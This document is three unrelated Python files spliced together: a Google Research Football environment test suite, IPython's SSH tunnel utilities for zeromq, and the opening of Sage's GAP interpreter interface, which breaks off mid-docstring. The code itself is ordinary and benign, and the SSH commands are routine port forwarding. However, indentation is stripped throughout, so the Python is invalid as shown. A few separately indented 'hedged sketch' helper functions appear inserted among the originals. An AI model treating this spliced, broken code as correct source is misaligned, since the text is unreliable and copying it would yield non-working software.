# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Football environment E2E test."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
import multiprocessing
from multiprocessing import pool
from multiprocessing import Queue
import gfootball
import os
import random
import threading
import zlib
from gfootball.env import config
from gfootball.env import football_action_set
from gfootball.env import football_env
from gfootball.env import observation_rotation
from gfootball.env import scenario_builder
import numpy as np
import psutil
from six.moves import range
import unittest
fast_run = False
def observation_hash(observation, hash_value = 0):
for obs in observation:
hash_value = zlib.adler32(
str(tuple(sorted(obs.items()))).encode(), hash_value)
return hash_value
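# Hedged sketch for observation_hash: any list of dicts with sortable keys works;
# the keys below are placeholders, not the full gfootball observation layout.
def _observation_hash_demo():
    fake_observation = [{'ball': (0.0, 0.0, 0.0), 'score': (0, 0)}]
    return observation_hash(fake_observation)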
def compute_hash(env, actions, extensive=False):
"""Computes hash of observations returned by environment for a given scenario.
Args:
env: environment
actions: number of actions
extensive: whether to run full episode
Returns:
hash
"""
o = env.reset()
hash_value = observation_hash(o)
done = False
step = 0
while not done:
o, _, done, _ = env.step(step % actions)
hash_value = observation_hash(o, hash_value)
step += 1
if not extensive and step >= 200:
break
return hash_value
def run_scenario(cfg, seed, queue, actions, render=False, validation=True):
env = football_env.FootballEnv(cfg)
if render:
env.render()
env.reset()
if validation:
env.tracker_setup(0, 999999999999999)
done = False
for action in actions:
obs, _, done, _ = env.step([action, action])
queue.put(obs)
if done:
break
queue.put(None)
env.close()
def normalize_observation(o):
if o['ball'][0] == -0:
o['ball'][0] = 0
if o['ball'][1] == -0:
o['ball'][1] = 0
if o['ball_direction'][0] == -0:
o['ball_direction'][0] = 0
if o['ball_direction'][1] == -0:
o['ball_direction'][1] = 0
class FootballEnvTest(parameterized.TestCase):
def compare_observations(self, l1, l2):
for o1, o2 in zip(l1, l2):
if 'frame' in o1 and 'frame' not in o2:
del o1['frame']
elif 'frame' in o2 and 'frame' not in o1:
del o2['frame']
normalize_observation(o1)
normalize_observation(o2)
o1 = str(tuple(sorted(o1.items())))
o2 = str(tuple(sorted(o2.items())))
self.assertEqual(o1, o2)
def check_determinism(self, extensive=False):
"""Check that environment is deterministic."""
if 'UNITTEST_IN_DOCKER' in os.environ:
return
cfg = config.Config({
'level': 'tests.11_vs_11_hard_deterministic'
})
env = football_env.FootballEnv(cfg)
actions = len(football_action_set.get_action_set(cfg))
for episode in range(1 if extensive else 2):
hash_value = compute_hash(env, actions, extensive)
if extensive:
self.assertEqual(hash_value, 2258127135)
elif episode % 2 == 0:
self.assertEqual(hash_value, 716323440)
else:
self.assertEqual(hash_value, 1663893701)
env.close()
def test_score_empty_goal(self):
"""Score on an empty goal."""
cfg = config.Config()
env = football_env.FootballEnv(cfg)
cfg['level'] = 'academy_empty_goal'
last_o = env.reset()[0]
for _ in range(120):
o, reward, done, _ = env.step(football_action_set.action_right)
o = o[0]
if done:
self.assertEqual(reward, 1)
break
self.assertFalse(done)
self.assertGreaterEqual(o['ball'][0], last_o['ball'][0] - 0.01)
self.assertGreaterEqual(
o['left_team'][o['active']][0],
last_o['left_team'][last_o['active']][0] - 0.01)
last_o = o
self.assertTrue(done)
env.close()
def test_render(self):
"""Make sure rendering is not broken."""
if 'UNITTEST_IN_DOCKER' in os.environ:
# Rendering is not supported.
return
cfg = config.Config({
'level': 'tests.11_vs_11_hard_deterministic',
})
env = football_env.FootballEnv(cfg)
env.render()
o = env.reset()
hash = observation_hash(o)
for _ in range(10):
o, _, _, _ = env.step(football_action_set.action_right)
hash = observation_hash(o, hash)
self.assertEqual(hash, 845594868)
env.close()
def test_dynamic_render(self):
"""Verifies dynamic render support."""
if 'UNITTEST_IN_DOCKER' in os.environ:
# Rendering is not supported.
return
cfg = config.Config({
'level': 'tests.11_vs_11_hard_deterministic',
})
env = football_env.FootballEnv(cfg)
o = env.reset()
for _ in range(10):
o, _, _, _ = env.step(football_action_set.action_right)
self.assertNotIn('frame', o[0])
env.render()
self.assertIn('frame', env.observation()[0])
self.compare_observations(o, env.observation())
o, _, _, _ = env.step(football_action_set.action_right)
self.assertIn('frame', env.observation()[0])
env.disable_render()
self.compare_observations(o, env.observation())
env.close()
def test_different_action_formats(self):
"""Verify different action formats are accepted."""
cfg = config.Config()
env = football_env.FootballEnv(cfg)
env.reset()
env.step(football_action_set.action_right)
env.step([football_action_set.action_right])
env.step(np.array([football_action_set.action_right]))
env.step(np.array(football_action_set.action_right))
env.close()
def test_determinism_extensive(self):
self.check_determinism(extensive=True)
def test_determinism(self):
self.check_determinism()
def test_multi_instance(self):
"""Validates that two instances of the env can run in the same thread."""
tpool = pool.ThreadPool(processes=2)
run1 = tpool.apply_async(self.check_determinism)
run2 = tpool.apply_async(self.check_determinism)
run1.get()
run2.get()
def test_multi_render(self):
"""Only one rendering instance allowed at a time."""
if 'UNITTEST_IN_DOCKER' in os.environ:
# Rendering is not supported.
return
cfg = config.Config({})
env1 = football_env.FootballEnv(cfg)
env1.render()
env1.reset()
env2 = football_env.FootballEnv(cfg)
try:
env2.render()
except AssertionError:
env1.close()
env2.close()
# It is still possible to render.
env3 = football_env.FootballEnv(cfg)
env3.reset()
env3.close()
return
assert False, 'Exception expected'
def test_scenarios_are_at_least_loading(self):
cfg = config.Config()
for l in scenario_builder.all_scenarios():
cfg['level'] = l
unused_game_cfg = cfg.ScenarioConfig()
def memory_usage(self):
process = psutil.Process(os.getpid())
return process.memory_info().rss
def test__memory_usage(self):
"""Make sure memory usage is low when not recording videos."""
# This test has to go first, so that memory usage is not affected.
if 'UNITTEST_IN_DOCKER' in os.environ:
# Forge doesn't support rendering.
return
cfg = config.Config({'write_video': False})
env = football_env.FootballEnv(cfg)
env.render()
env.reset()
initial_memory = self.memory_usage()
for _ in range(100):
_, _, _, _ = env.step(football_action_set.action_right)
memory_usage = self.memory_usage() - initial_memory
env.close()
self.assertGreaterEqual(10000000, memory_usage)
def test_player_order_invariant(self):
"""Checks that environment behaves the same regardless of players order."""
players = ['agent:right_players=1', 'lazy:left_players=11']
cfg = config.Config({
'level': 'tests.11_vs_11_hard_deterministic',
'players': players
})
env = football_env.FootballEnv(cfg)
actions = len(football_action_set.get_action_set(cfg))
hash_value1 = compute_hash(env, actions)
players = [players[1], players[0]]
cfg = config.Config({
'level': 'tests.11_vs_11_hard_deterministic',
'players': players
})
env = football_env.FootballEnv(cfg)
hash_value2 = compute_hash(env, actions)
self.assertEqual(hash_value1, hash_value2)
env.close()
@parameterized.parameters(range(1))
def test_setstate(self, seed):
"""Checks setState functionality."""
cfg1 = config.Config({
'level': 'tests.symmetric',
'game_engine_random_seed': seed,
'reverse_team_processing' : False
})
cfg2 = config.Config({
'level': 'tests.symmetric',
'game_engine_random_seed': seed + 10,
'reverse_team_processing' : False
})
env1 = football_env.FootballEnv(cfg1)
env2 = football_env.FootballEnv(cfg2)
initial_obs = env1.reset()
env2.reset()
initial_state = env1.get_state()
env2.set_state(initial_state)
random.seed(seed)
actions = len(football_action_set.get_action_set(cfg1))
first_action = random.randint(0, actions - 1)
first_obs, _, _, _ = env1.step(first_action)
_, _, _, _ = env2.step(first_action)
step = 0
limit = 10 if fast_run else 3000
while step < limit:
step += 1
action = random.randint(0, actions - 1)
if step % 10 == 0:
env2.set_state(initial_state)
self.compare_observations(initial_obs, env2.observation())
env2.step(first_action)
self.compare_observations(first_obs, env2.observation())
env2.set_state(env1.get_state())
self.compare_observations(env1.observation(), env2.observation())
_, _, done1, _ = env1.step(action)
_, _, done2, _ = env2.step(action)
self.assertEqual(done1, done2)
if done1:
break
env1.close()
env2.close()
@parameterized.parameters(range(1))
def test_symmetry(self, seed):
"""Checks game symmetry."""
processes = []
cfg1 = config.Config({
'level': 'tests.symmetric',
'game_engine_random_seed': seed,
'players': ['agent:left_players=1,right_players=1'],
'reverse_team_processing': False,
})
cfg2 = config.Config({
'level': 'tests.symmetric',
'game_engine_random_seed': seed,
'players': ['agent:left_players=1,right_players=1'],
'reverse_team_processing': True,
})
random.seed(seed)
action_cnt = len(football_action_set.get_action_set(cfg1))
actions = [random.randint(0, action_cnt - 1) for _ in range(10 if fast_run else 3000)]
queue1 = Queue()
thread1 = threading.Thread(
target=run_scenario, args=(cfg1, seed, queue1, actions))
thread1.start()
queue2 = Queue()
thread2 = threading.Thread(
target=run_scenario, args=(cfg2, seed, queue2, actions))
thread2.start()
while True:
o1 = queue1.get()
o2 = queue2.get()
if not o1 or not o2:
self.assertEqual(o1, o2)
break
self.compare_observations(o1[:1], o2[1:])
self.compare_observations(o2[:1], o1[1:])
thread1.join()
thread2.join()
@parameterized.parameters((1, 'left', True), (0, 'right', True),
(1, 'left', False), (0, 'right', False))
def offside_helper(self, episode, team2, reverse):
cfg = config.Config({
'level': 'tests.offside_test',
'players': ['agent:{}_players=1'.format(team2)],
'episode_number': episode,
'reverse_team_processing': reverse,
})
env = football_env.FootballEnv(cfg)
env.reset()
o, _, done, _ = env.step(football_action_set.action_long_pass)
done = False
while not done and o[0]['right_team'][1][0] == 0:
o, _, done, _ = env.step(football_action_set.action_idle)
self.assertAlmostEqual(o[0]['ball'][0], 0.6, delta=0.4)
self.assertAlmostEqual(o[0]['right_team'][0][0], 0.6, delta=0.4)
self.assertAlmostEqual(o[0]['right_team'][1][0], 0.6, delta=0.4)
self.assertAlmostEqual(o[0]['left_team'][0][0], -0.6, delta=0.4)
self.assertAlmostEqual(o[0]['left_team'][1][0], -0.6, delta=0.4)
env.close()
@parameterized.parameters((0, 1, True), (1, -1, True), (0, 1, False),
(1, -1, False))
def test_corner(self, episode, factor, reverse):
cfg = config.Config({
'level': 'tests.corner_test',
'players': ['agent:left_players=1,right_players=1'],
'episode_number': episode,
'reverse_team_processing': reverse,
})
env = football_env.FootballEnv(cfg)
o = env.reset()
done = False
while not done:
o, _, done, _ = env.step([football_action_set.action_left, football_action_set.action_left])
self.assertAlmostEqual(o[0]['ball'][0], -0.95 * factor, delta=0.1)
self.assertAlmostEqual(o[0]['ball'][1], 0.4 * factor, delta=0.1)
self.assertAlmostEqual(o[0]['right_team'][0][0], 1, delta=0.1)
self.assertAlmostEqual(o[0]['right_team'][1][0], -0.95 * factor, delta=0.1)
self.assertAlmostEqual(o[0]['left_team'][0][0], -0.95, delta=0.1)
self.assertAlmostEqual(o[0]['left_team'][1][0], -0.9 * factor, delta=0.2)
env.close()
def test_penalty(self):
cfg = config.Config({
'level': 'tests.penalty',
'players': ['agent:left_players=1'],
})
env = football_env.FootballEnv(cfg)
o = env.reset()
done = False
while not done:
o, _, done, _ = env.step([football_action_set.action_sliding])
self.assertAlmostEqual(o[0]['ball'][0], -0.809, delta=0.01)
self.assertAlmostEqual(o[0]['ball'][1], 0.0, delta=0.01)
self.assertAlmostEqual(o[0]['right_team'][0][0], 1, delta=0.1)
self.assertAlmostEqual(o[0]['right_team'][1][0], -0.75, delta=0.1)
self.assertAlmostEqual(o[0]['left_team'][0][0], -0.95, delta=0.1)
self.assertAlmostEqual(o[0]['left_team'][1][0], -0.70, delta=0.1)
env.close()
@parameterized.parameters((0, -1, True), (1, 1, True), (0, -1, False),
(1, 1, False))
def test_keeper_ball(self, episode, factor, reverse):
cfg = config.Config({
'level': 'tests.keeper_test',
'players': ['agent:left_players=1,right_players=1'],
'episode_number': episode,
'reverse_team_processing': reverse,
})
env = football_env.FootballEnv(cfg)
o = env.reset()
done = False
while not done:
o, _, done, _ = env.step([football_action_set.action_right, football_action_set.action_right])
self.assertAlmostEqual(o[0]['ball'][0], -1.0 * factor, delta=0.1)
self.assertAlmostEqual(o[0]['ball'][1], 0.0, delta=0.1)
self.assertAlmostEqual(o[0]['right_team'][0][0], 1, delta=0.1)
self.assertAlmostEqual(o[0]['right_team'][1][0], 0.4, delta=0.1)
self.assertAlmostEqual(o[0]['left_team'][0][0], -0.9, delta=0.1)
self.assertAlmostEqual(o[0]['left_team'][1][0], -0.33, delta=0.1)
env.close()
@parameterized.parameters((0, True), (1, True), (0, False), (1, False))
def test_goal(self, episode, reverse):
cfg = config.Config({
'level': 'tests.goal_test',
'players': ['agent:left_players=1,right_players=1'],
'episode_number': episode,
'reverse_team_processing': reverse,
})
env = football_env.FootballEnv(cfg)
o = env.reset()
done = False
while not done:
o, _, done, _ = env.step(
[football_action_set.action_right, football_action_set.action_right])
self.assertAlmostEqual(o[0]['ball'][0], 0.0, delta=0.1)
self.assertEqual(o[0]['score'][episode], 1)
self.assertEqual(o[0]['score'][1 - episode], 0)
env.close()
@parameterized.parameters(range(1))
def test_render_state_equals_norender(self, seed):
"""Checks that rendering game state is the same as non-rendering."""
if 'UNITTEST_IN_DOCKER' in os.environ:
# Forge doesn't support rendering.
return
processes = []
cfg1 = config.Config({
'level': 'tests.symmetric',
'game_engine_random_seed': seed,
'players': ['agent:left_players=1,right_players=1'],
'reverse_team_processing': False,
})
cfg2 = config.Config({
'level': 'tests.symmetric',
'game_engine_random_seed': seed,
'players': ['agent:left_players=1,right_players=1'],
'reverse_team_processing': False,
})
random.seed(seed)
action_cnt = len(football_action_set.get_action_set(cfg1))
actions = [random.randint(0, action_cnt - 1) for _ in range(50)]
queue1 = Queue()
thread1 = threading.Thread(
target=run_scenario, args=(cfg1, seed, queue1, actions, False, False))
thread1.start()
queue2 = Queue()
thread2 = threading.Thread(
target=run_scenario, args=(cfg2, seed, queue2, actions, True, False))
thread2.start()
while True:
o1 = queue1.get()
o2 = queue2.get()
if not o1 or not o2:
self.assertEqual(o1, o2)
break
self.compare_observations(o1, o2)
thread1.join()
thread2.join()
def test_get_state_wrapper(self):
env = gfootball.env.create_environment(
stacked=True,
env_name='academy_empty_goal',
rewards='checkpoints,scoring')
o = env.reset()
state = env.get_state()
reward1 = 0
hash1 = 0
while reward1 < 0.9:
o, r, _, _ = env.step(football_action_set.action_right)
reward1 += r
hash1 = zlib.adler32(o, hash1)
self.assertAlmostEqual(reward1, 0.9, delta=0.01)
env.set_state(state)
hash2 = 0
reward2 = 0
while reward2 < 0.9:
o, r, _, _ = env.step(football_action_set.action_right)
reward2 += r
hash2 = zlib.adler32(o, hash2)
self.assertAlmostEqual(reward2, 0.9, delta=0.01)
self.assertEqual(hash1, hash2)
def test_restore_after_reset(self):
cfg = config.Config({
'level': '11_vs_11_competition',
})
env = football_env.FootballEnv(cfg)
obs = env.reset()
state = env.get_state()
env.reset()
env.set_state(state)
obs_ = env.observation()
state_ = env.get_state()
env.step(0) # Test if can take step
self.compare_observations(obs, obs_)
self.assertEqual(state, state_)
if __name__ == '__main__':
unittest.main(failfast=True)
|
tunnel.py
|
"""Basic ssh tunnel utilities, and convenience functions for tunneling
zeromq connections.
Authors
-------
* Min RK
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2010-2011 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
from __future__ import print_function
import os,sys, atexit
import socket
from multiprocessing import Process
from getpass import getpass, getuser
import warnings
try:
with warnings.catch_warnings():
warnings.simplefilter('ignore', DeprecationWarning)
import paramiko
except ImportError:
paramiko = None
else:
from forward import forward_tunnel
try:
from IPython.external import pexpect
except ImportError:
pexpect = None
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
# select_random_ports copied from IPython.parallel.util
_random_ports = set()
def select_random_ports(n):
"""Selects and return n random ports that are available."""
ports = []
for i in xrange(n):
sock = socket.socket()
sock.bind(('', 0))
while sock.getsockname()[1] in _random_ports:
sock.close()
sock = socket.socket()
sock.bind(('', 0))
ports.append(sock)
for i, sock in enumerate(ports):
port = sock.getsockname()[1]
sock.close()
ports[i] = port
_random_ports.add(port)
return ports
#-----------------------------------------------------------------------------
# Check for passwordless login
#-----------------------------------------------------------------------------
def try_passwordless_ssh(server, keyfile, paramiko=None):
"""Attempt to make an ssh connection without a password.
This is mainly used for requiring password input only once
when many tunnels may be connected to the same server.
If paramiko is None, the default for the platform is chosen.
"""
if paramiko is None:
paramiko = sys.platform == 'win32'
if not paramiko:
f = _try_passwordless_openssh
else:
f = _try_passwordless_paramiko
return f(server, keyfile)
def _try_passwordless_openssh(server, keyfile):
"""Try passwordless login with shell ssh command."""
if pexpect is None:
raise ImportError("pexpect unavailable, use paramiko")
cmd = 'ssh -f '+ server
if keyfile:
cmd += ' -i ' + keyfile
cmd += ' exit'
p = pexpect.spawn(cmd)
while True:
try:
p.expect('[Pp]assword:', timeout=.1)
except pexpect.TIMEOUT:
continue
except pexpect.EOF:
return True
else:
return False
def _try_passwordless_paramiko(server, keyfile):
"""Try passwordless login with paramiko."""
if paramiko is None:
msg = "Paramiko unavaliable, "
if sys.platform == 'win32':
msg += "Paramiko is required for ssh tunneled connections on Windows."
else:
msg += "use OpenSSH."
raise ImportError(msg)
username, server, port = _split_server(server)
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.WarningPolicy())
try:
client.connect(server, port, username=username, key_filename=keyfile,
look_for_keys=True)
except paramiko.AuthenticationException:
return False
else:
client.close()
return True
def tunnel_connection(socket, addr, server, keyfile=None, password=None, paramiko=None, timeout=60):
"""Connect a socket to an address via an ssh tunnel.
This is a wrapper for socket.connect(addr), when addr is not accessible
from the local machine. It simply creates an ssh tunnel using the remaining args,
and calls socket.connect('tcp://localhost:lport') where lport is the randomly
selected local port of the tunnel.
"""
new_url, tunnel = open_tunnel(addr, server, keyfile=keyfile, password=password, paramiko=paramiko, timeout=timeout)
socket.connect(new_url)
return tunnel
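# Hedged usage sketch: connect a zmq socket through an ssh tunnel. The server string,
# key path and remote address are placeholders; pyzmq must be installed.
def _tunnel_connection_demo():
    import zmq
    sock = zmq.Context.instance().socket(zmq.REQ)
    tunnel = tunnel_connection(sock, 'tcp://10.0.0.5:5555',
                               'user@gateway.example.com', keyfile='~/.ssh/id_rsa')
    return tunnel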
def open_tunnel(addr, server, keyfile=None, password=None, paramiko=None, timeout=60):
"""Open a tunneled connection from a 0MQ url.
For use inside tunnel_connection.
Returns
-------
(url, tunnel): The 0MQ url that has been forwarded, and the tunnel object
"""
lport = select_random_ports(1)[0]
transport, addr = addr.split('://')
ip,rport = addr.split(':')
rport = int(rport)
if paramiko is None:
paramiko = sys.platform == 'win32'
if paramiko:
tunnelf = paramiko_tunnel
else:
tunnelf = openssh_tunnel
tunnel = tunnelf(lport, rport, server, remoteip=ip, keyfile=keyfile, password=password, timeout=timeout)
return 'tcp://127.0.0.1:%i'%lport, tunnel
def openssh_tunnel(lport, rport, server, remoteip='127.0.0.1', keyfile=None, password=None, timeout=60):
"""Create an ssh tunnel using command-line ssh that connects port lport
on this machine to localhost:rport on server. The tunnel
will automatically close when not in use, remaining open
for a minimum of timeout seconds for an initial connection.
This creates a tunnel redirecting `localhost:lport` to `remoteip:rport`,
as seen from `server`.
keyfile and password may be specified, but ssh config is checked for defaults.
Parameters
----------
lport : int
local port for connecting to the tunnel from this machine.
rport : int
port on the remote machine to connect to.
server : str
The ssh server to connect to. The full ssh server string will be parsed.
user@server:port
remoteip : str [Default: 127.0.0.1]
The remote ip, specifying the destination of the tunnel.
Default is localhost, which means that the tunnel would redirect
localhost:lport on this machine to localhost:rport on the *server*.
keyfile : str; path to public key file
This specifies a key to be used in ssh login, default None.
Regular default ssh keys will be used without specifying this argument.
password : str;
Your ssh password to the ssh server. Note that if this is left None,
you will be prompted for it if passwordless key based login is unavailable.
timeout : int [default: 60]
The time (in seconds) after which no activity will result in the tunnel
closing. This prevents orphaned tunnels from running forever.
"""
if pexpect is None:
raise ImportError("pexpect unavailable, use paramiko_tunnel")
ssh="ssh "
if keyfile:
ssh += "-i " + keyfile
if ':' in server:
server, port = server.split(':')
ssh += " -p %s" % port
cmd = "%s -f -L 127.0.0.1:%i:%s:%i %s sleep %i" % (
ssh, lport, remoteip, rport, server, timeout)
tunnel = pexpect.spawn(cmd)
failed = False
while True:
try:
tunnel.expect('[Pp]assword:', timeout=.1)
except pexpect.TIMEOUT:
continue
except pexpect.EOF:
if tunnel.exitstatus:
print (tunnel.exitstatus)
print (tunnel.before)
print (tunnel.after)
raise RuntimeError("tunnel '%s' failed to start"%(cmd))
else:
return tunnel.pid
else:
if failed:
print("Password rejected, try again")
password=None
if password is None:
password = getpass("%s's password: "%(server))
tunnel.sendline(password)
failed = True
def _split_server(server):
if '@' in server:
username,server = server.split('@', 1)
else:
username = getuser()
if ':' in server:
server, port = server.split(':')
port = int(port)
else:
port = 22
return username, server, port
def paramiko_tunnel(lport, rport, server, remoteip='127.0.0.1', keyfile=None, password=None, timeout=60):
"""launch a tunner with paramiko in a subprocess. This should only be used
when shell ssh is unavailable (e.g. Windows).
This creates a tunnel redirecting `localhost:lport` to `remoteip:rport`,
as seen from `server`.
If you are familiar with ssh tunnels, this creates the tunnel:
ssh server -L localhost:lport:remoteip:rport
keyfile and password may be specified, but ssh config is checked for defaults.
Parameters
----------
lport : int
local port for connecting to the tunnel from this machine.
rport : int
port on the remote machine to connect to.
server : str
The ssh server to connect to. The full ssh server string will be parsed.
user@server:port
remoteip : str [Default: 127.0.0.1]
The remote ip, specifying the destination of the tunnel.
Default is localhost, which means that the tunnel would redirect
localhost:lport on this machine to localhost:rport on the *server*.
keyfile : str; path to public key file
This specifies a key to be used in ssh login, default None.
Regular default ssh keys will be used without specifying this argument.
password : str;
Your ssh password to the ssh server. Note that if this is left None,
you will be prompted for it if passwordless key based login is unavailable.
timeout : int [default: 60]
The time (in seconds) after which no activity will result in the tunnel
closing. This prevents orphaned tunnels from running forever.
"""
if paramiko is None:
raise ImportError("Paramiko not available")
if password is None:
if not _try_passwordless_paramiko(server, keyfile):
password = getpass("%s's password: "%(server))
p = Process(target=_paramiko_tunnel,
args=(lport, rport, server, remoteip),
kwargs=dict(keyfile=keyfile, password=password))
p.daemon=False
p.start()
atexit.register(_shutdown_process, p)
return p
def _shutdown_process(p):
if p.is_alive():
p.terminate()
def _paramiko_tunnel(lport, rport, server, remoteip, keyfile=None, password=None):
"""Function for actually starting a paramiko tunnel, to be passed
to multiprocessing.Process(target=this), and not called directly.
"""
username, server, port = _split_server(server)
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.WarningPolicy())
try:
client.connect(server, port, username=username, key_filename=keyfile,
look_for_keys=True, password=password)
# except paramiko.AuthenticationException:
# if password is None:
# password = getpass("%s@%s's password: "%(username, server))
# client.connect(server, port, username=username, password=password)
# else:
# raise
except Exception as e:
print ('*** Failed to connect to %s:%d: %r' % (server, port, e))
sys.exit(1)
# print ('Now forwarding port %d to %s:%d ...' % (lport, server, rport))
try:
forward_tunnel(lport, remoteip, rport, client.get_transport())
except KeyboardInterrupt:
print ('SIGINT: Port forwarding stopped cleanly')
sys.exit(0)
except Exception as e:
print ("Port forwarding stopped uncleanly: %s"%e)
sys.exit(255)
if sys.platform == 'win32':
ssh_tunnel = paramiko_tunnel
else:
ssh_tunnel = openssh_tunnel
__all__ = ['tunnel_connection', 'ssh_tunnel', 'openssh_tunnel', 'paramiko_tunnel', 'try_passwordless_ssh']
|
gap.py
|
# -*- coding: utf-8 -*-
r"""
Interface to GAP
Sage provides an interface to the GAP system. This system provides
extensive group theory, combinatorics, etc.
The GAP interface will only work if GAP is installed on your
computer; this should be the case, since GAP is included with Sage.
The interface offers three pieces of functionality:
#. ``gap_console()`` - A function that dumps you into
an interactive command-line GAP session.
#. ``gap(expr)`` - Evaluation of arbitrary GAP
expressions, with the result returned as a string.
#. ``gap.new(expr)`` - Creation of a Sage object that
wraps a GAP object. This provides a Pythonic interface to GAP. For
example, if ``f=gap.new(10)``, then
``f.Factors()`` returns the prime factorization of
`10` computed using GAP.
First Examples
--------------
We factor an integer using GAP::
sage: n = gap(20062006); n
20062006
sage: n.parent()
Gap
sage: fac = n.Factors(); fac
[ 2, 17, 59, 73, 137 ]
sage: fac.parent()
Gap
sage: fac[1]
2
GAP and Singular
----------------
This example illustrates conversion between Singular and GAP via
Sage as an intermediate step. First we create and factor a Singular
polynomial.
::
sage: singular(389)
389
sage: R1 = singular.ring(0, '(x,y)', 'dp')
sage: f = singular('9*x^16-18*x^13*y^2-9*x^12*y^3+9*x^10*y^4-18*x^11*y^2+36*x^8*y^4+18*x^7*y^5-18*x^5*y^6+9*x^6*y^4-18*x^3*y^6-9*x^2*y^7+9*y^8')
sage: F = f.factorize()
sage: print(F)
[1]:
_[1]=9
_[2]=x^6-2*x^3*y^2-x^2*y^3+y^4
_[3]=-x^5+y^2
[2]:
1,1,2
Next we convert the factor `-x^5+y^2` to a Sage
multivariate polynomial. Note that it is important to let
`x` and `y` be the generators of a polynomial ring,
so the eval command works.
::
sage: R.<x,y> = PolynomialRing(QQ,2)
sage: s = F[1][3].sage_polystring(); s
'-x**5+y**2'
sage: g = eval(s); g
-x^5 + y^2
Next we create a polynomial ring in GAP and obtain its
indeterminates::
sage: R = gap.PolynomialRing('Rationals', 2); R
PolynomialRing( Rationals, ["x_1", "x_2"] )
sage: I = R.IndeterminatesOfPolynomialRing(); I
[ x_1, x_2 ]
In order to eval `g` in GAP, we need to tell GAP to view
the variables ``x0`` and ``x1`` as the two
generators of `R`. This is the one tricky part. In the GAP
interpreter the object ``I`` has its own name (which
isn't ``I``). We can access its name using
``I.name()``.
::
sage: _ = gap.eval("x := %s[1];; y := %s[2];;"%(I.name(), I.name()))
Now `x_0` and `x_1` are defined, so we can
construct the GAP polynomial `f` corresponding to
`g`::
sage: R.<x,y> = PolynomialRing(QQ,2)
sage: f = gap(str(g)); f
-x_1^5+x_2^2
We can call GAP functions on `f`. For example, we evaluate
the GAP ``Value`` function, which evaluates `f`
at the point `(1,2)`.
::
sage: f.Value(I, [1,2])
3
sage: g(1,2) # agrees
3
Saving and loading objects
--------------------------
Saving and loading GAP objects (using the dumps method, etc.) is
*not* supported, since the output string representation of Gap
objects is sometimes not valid input to GAP. Creating classes that
wrap GAP objects *is* supported, by simply defining a
_gap_init_ member function that returns a string that when
evaluated in GAP constructs the object. See
``groups/perm_gps/permgroup.py`` for a nontrivial
example of this.
Long Input
----------
The GAP interface reads in even very long input (using files) in a
robust manner, as long as you are creating a new object.
.. note::
Using ``gap.eval`` for long input is much less robust, and is not
recommended.
::
sage: t = '"%s"'%10^10000 # ten thousand character string.
sage: a = gap(t)
Changing which GAP is used
--------------------------
Use this code to change which GAP interpreter is run. E.g.,
::
import sage.interfaces.gap
sage.interfaces.gap.gap_cmd = "/usr/local/bin/gap"
AUTHORS:
- David Joyner and William Stein: initial version(s)
- William Stein (2006-02-01): modified gap_console command so it uses
exactly the same startup command as Gap.__init__.
- William Stein (2006-03-02): added tab completions: gap.[tab], x =
gap(...), x.[tab], and docs, e.g., gap.function? and x.function?
"""
#*****************************************************************************
# Copyright (C) 2005 William Stein <wstein@gmail.com>
#
# Distributed under the terms of the GNU General Public License (GPL)
#
# This code is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# The full text of the GPL is available at:
#
# http://www.gnu.org/licenses/
#*****************************************************************************
from .expect import Expect, ExpectElement, FunctionElement, ExpectFunction
from .gap_workspace import gap_workspace_file, prepare_workspace_dir
from sage.cpython.string import bytes_to_str
from sage.env import SAGE_EXTCODE
from sage.misc.misc import is_in_string
from sage.misc.cachefunc import cached_method
from sage.docs.instancedoc import instancedoc
from sage.interfaces.tab_completion import ExtraTabCompletion
from sage.structure.element import ModuleElement
import re
import os
import io
import pexpect
import time
import platform
import string
import warnings
WORKSPACE = gap_workspace_file()
first_try = True
gap_cmd = "gap -r"
if platform.processor() == 'ia64' and os.path.exists('/usr/bin/prctl'):
# suppress unaligned access to 0x..., ip=0x... warnings
gap_cmd = 'prctl --unaligned=silent ' + gap_cmd
def gap_command(use_workspace_cache=True, local=True):
if use_workspace_cache:
if local:
return "%s -L %s"%(gap_cmd, WORKSPACE), False
else:
# TO DO: Use remote workspace
return gap_cmd, False
else:
return gap_cmd, True
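# Hedged sketch of what gap_command() returns: a (command string, flag) pair, where the
# flag appears to indicate that no cached workspace is being loaded. The workspace path
# depends on the local Sage installation.
def _gap_command_demo():
    cmd, no_workspace_cache = gap_command(use_workspace_cache=True, local=True)
    return cmd, no_workspace_cache   # e.g. ('gap -r -L /path/to/workspace', False)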
############ Classes with methods for both the GAP3 and GAP4 interface
class Gap_generic(ExtraTabCompletion, Expect):
r"""
Generic interface to the GAP3/GAP4 interpreters.
AUTHORS:
- William Stein and David Joyner (interface for GAP4)
- Franco Saliola (Feb 2010): refactored to separate out the generic
code
"""
_identical_function = "IsIdenticalObj"
def _synchronize(self, timeout=0.5, cmd='%s;'):
"""
Synchronize GAP pexpect interface.
See the base method
:meth:`~sage.interfaces.expect.Expect._synchronize` for more
details.
We override this method since we are looking at GAP package
mode output, which is quite different from the normal
(human-readable) interface.
EXAMPLES::
sage: gap('"ok"')
ok
sage: gap._expect.sendline() # now we are out of sync
1
sage: gap._synchronize()
sage: gap(123)
123
"""
if self._expect is None:
return
E = self._expect
from sage.misc.prandom import randrange
rnd = randrange(2147483647)
cmd = str(rnd)+';'
try:
E.sendline(cmd)
E.expect(r'@[nf][@J\s>]*'+str(rnd), timeout=timeout)
E.send(' ')
E.expect('@i', timeout=timeout)
except pexpect.TIMEOUT:
self.interrupt()
except pexpect.EOF:
self._crash_msg()
self.quit()
def interrupt(self, tries=None, timeout=1, quit_on_fail=True):
"""
